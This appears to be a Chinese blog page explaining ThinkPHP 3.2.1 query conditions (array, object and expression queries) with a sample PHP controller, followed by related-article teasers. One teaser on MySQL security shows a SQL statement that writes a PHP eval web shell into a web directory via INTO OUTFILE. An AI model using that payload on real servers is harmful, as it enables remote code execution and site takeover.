基本查询方式
    字符串条件查询,
    索引数组条件查询
    对象条件查询
    
SQL语句
大小写是一样的,
但是,执行的时候有一个小写到大写的转换,所以最好写大写

$condition=new \stdClass();//对象形式查询
stdClass是php内置类,可以理解为一个空类,这里要把条件作为字段保存到其中,
而 反斜杠\ 是将命名空间设置为  根目录, 否则会导致当前目录找不到此类。

表达式查询
    大于 小于  等于
    自定义表达式
    
格式:
    $map['字段名']=array('表达式','查询条件');

<?php
// 本类由系统自动生成,仅供测试用途
namespace Home\Controller; use Think\Model;
use Think\Controller; class IndexController extends Controller {
    public function index() {
        
        // echo '<meta content-type=text/html;charset=utf-8/>';
        echo '<pre>';
        
        // $user=new Model('User');
        
        // var_dump( $user->select());
        
        $user = M ( 'User' );
        // var_dump($user->where('id=5 AND user="樱桃小丸子"')->select());
        
        // $condition['id']=5;
        // $condition['user']="樱桃小丸子";
        // var_dump($user->where($condition)->select());
        // //上面两条条件是AND的关系
        // $condition['_logic']="OR";
        // var_dump($user->where($condition)->select());
        
        $condition = new \stdClass (); // 对象形式查询
                                    // 前面的反斜杠表示按系统提供的查找std类
        $condition->id = 5;
        $condition->user = '樱桃小丸子';
        $condition->_logic = 'OR';
        var_dump ( $user->where ( $condition )->select () );
    }
    public function query() {
        $user = M ( 'User' );
        
        echo '<pre>';
        
        // $map['id']=array('eq',5);//这里到map1是随便起到,没有规定
        // $map['id']=array('neq',5);//id不等于5
        // $map['id']=array('gt',5);//id大于5
        // $map['id']=array('egt',5);//大于等于
        // $map['id']=array('lt',5);//小于
        // $map['id']=array('elt',5);//小于
        
        // 模糊查询,有三种
        // $map['user']=array('LIKE','%小%');//第一种,单一条件
        
        // $map['user']=array('notLIKE','%小%');//第二种, 大小写都无所谓
        // 注意,这里not like没有空格的
        
        // 多条件 模糊查询
        // $map['user']=array('like',array('%小%','%蜡%'),'and');
        
        // between - 区间查找,从m到n
        // $map['id']=array('between','5,7');//找出5到7之间的(5 6 7)
        // $map['id']=array('between',array('5','7'));//这是另一种形式
        
        // not between - 注意中间四是有一个空格的
        // $map['id']=array('not between','5,7');
        
        // in
        // $map['id']=array('in','5,6,8');
        // $map['id']=array('in',array('5','7','8'));
        
        // not in
        // $map['id']=array('not in','5,6,8');
        // $map['id']=array('not in',array('5','7','8'));
        
        // 自定义 查询 - exp
        
        $map['id']=array('exp','=5');
        $map['id']=array('exp','>10');
        
        // 构建一个复杂点的
        $map ['id'] = array (
                'exp',
                '=5' 
        );
        $map ['user'] = array (
                'exp',
                '="樱桃小丸子"' 
        );
        $map ['_logic'] = 'or';
        
        var_dump ( $user->where ( $map )->select () );
    }
}

[tp3.2.1]sql查询语句(一)的更多相关文章

  1. sql查询语句如何解析成分页查询?

    我们公司主要mysql存储数据,因此也封装了比较好用mysql通用方法,然后,我们做大量接口,在处理分页查询接口,没有很好分查询方法.sql查询 语句如何解析成“分页查询”和“总统计”两条语句.可能, ...

  2. 15个初学者必看的基础SQL查询语句

    本文由码农网 – 小峰原创翻译,转载请看清文末的转载要求,欢迎参与我们的付费投稿计划! 本文将分享15个初学者必看的基础SQL查询语句,都很基础,但是你不一定都会,所以好好看看吧. 1.创建表和数据插 ...

  3. SQL查询语句去除重复行

    1.存在两条完全相同的纪录 这是最简单的一种情况,用关键字distinct就可以去掉 select distinct * from table(表名) where (条件) 2.存在部分字段相同的纪录 ...

  4. WordPress 常用数据库SQL查询语句大全

    在使用WordPress的过程中,我们少不了要对数据库进行修改操作,比如,更换域名.修改附件目录.批量修改文章内容等等.这个时候,使用SQL查询语句可以大大简化我们的工作量. 关于如何操作SQL查询语 ...

  5. (转)经典SQL查询语句大全

    (转)经典SQL查询语句大全 一.基础1.说明:创建数据库CREATE DATABASE database-name2.说明:删除数据库drop database dbname3.说明:备份sql s ...

  6. 转: 从Mysql某一表中随机读取n条数据的SQL查询语句

    若要在i ≤ R ≤ j 这个范围得到一个随机整数R ,需要用到表达式 FLOOR(i + RAND() * (j – i + 1)).例如, 若要在7 到 12 的范围(包括7和12)内得到一个随机 ...

  7. 经典SQL查询语句大全

    一.基础1.说明:创建数据库CREATE DATABASE database-name2.说明:删除数据库drop database dbname3.说明:备份sql server--- 创建 备份数 ...

  8. oracle中sql查询语句的执行顺序

    查询语句的处理过程主要包含3个阶段:编译.执行.提取数据(sql查询语句的处理主要是由用户进程和服务器进程完成的,其他进程辅助配合) 一.编译parse 在进行编译时服务器进程会将sql语句的正文放入 ...

  9. SQL查询语句分类

    SQL查询语句有多种,下面总结下.首先先建三张表用于后面的实验 -- 学生表,记录学生信息 CREATE TABLE student( sno ), sname ), ssex ENUM('男','女 ...

随机推荐

  1. 弹窗插件layer

    layer的插件的地址:http://layer.layui.com/简单使用: layer.open({ type: , //page层 area: ['500px', '300px'], titl ...

  2. Android:学习AIDL,这一篇文章就够了(下)

    前言 上一篇博文介绍了关于AIDL是什么,为什么我们需要AIDL,AIDL的语法以及如何使用AIDL等方面的知识,这一篇博文将顺着上一篇的思路往下走,接着介绍关于AIDL的一些更加深入的知识.强烈建议 ...

  3. mysql 安全

    select '<?php @eval($_POST[1])?>' into outfile 'D:/APMServ5.2.6/www/htdocs/report/log.php' //一 ...

  4. MVC项目实践,在三层架构下实现SportsStore-09,ASP.NET MVC调用ASP.NET Web API的查询服务

    ASP.NET Web API和WCF都体现了REST软件架构风格.在REST中,把一切数据视为资源,所以也是一种面向资源的架构风格.所有的资源都可以通过URI来唯一标识,通过对资源的HTTP操作(G ...

  5. Silverlight/WPF绘制统计图Visifire.dll文件

    官网:http://www.visifire.com/ 一直没找到好的中文文档,希望有的这个的可以发个我! 效果图: 前台代码: <UserControl x:Class="Text_ ...

  6. iOS自动偏移64个像素

    自从iOS7开始,如果添加的scrollview是uiviewController第一个视图,系统会默认自动添加-64的偏移量,所以规避的方案就添加一个UIView之后再添加你的scrollview.

  7. D3D9 GPU Hacks (转载)

    D3D9 GPU Hacks I’ve been trying to catch up what hacks GPU vendors have exposed in Direct3D9, and tu ...

  8. AWR快照管理

    创建快照: SQL> exec dbms_workload_repository.create_snapshot(); 删除快照: SQL> exec dbms_workload_repo ...

  9. MySQL数据复制的校验

    在5.6之前,管理员只能通过ssl实现检校验5.6中,可以使用CRC32检查和来保证master和slave的数据的完整性.校验信息记录在master的二进制日志中和slave的relay日志中. m ...

  10. sockopt note

    1.closesocket(一般不会立即关闭而经历TIME_WAIT的过程)后想继续重用该socket:BOOL bReuseaddr=TRUE;setsockopt(s,SOL_SOCKET ,SO ...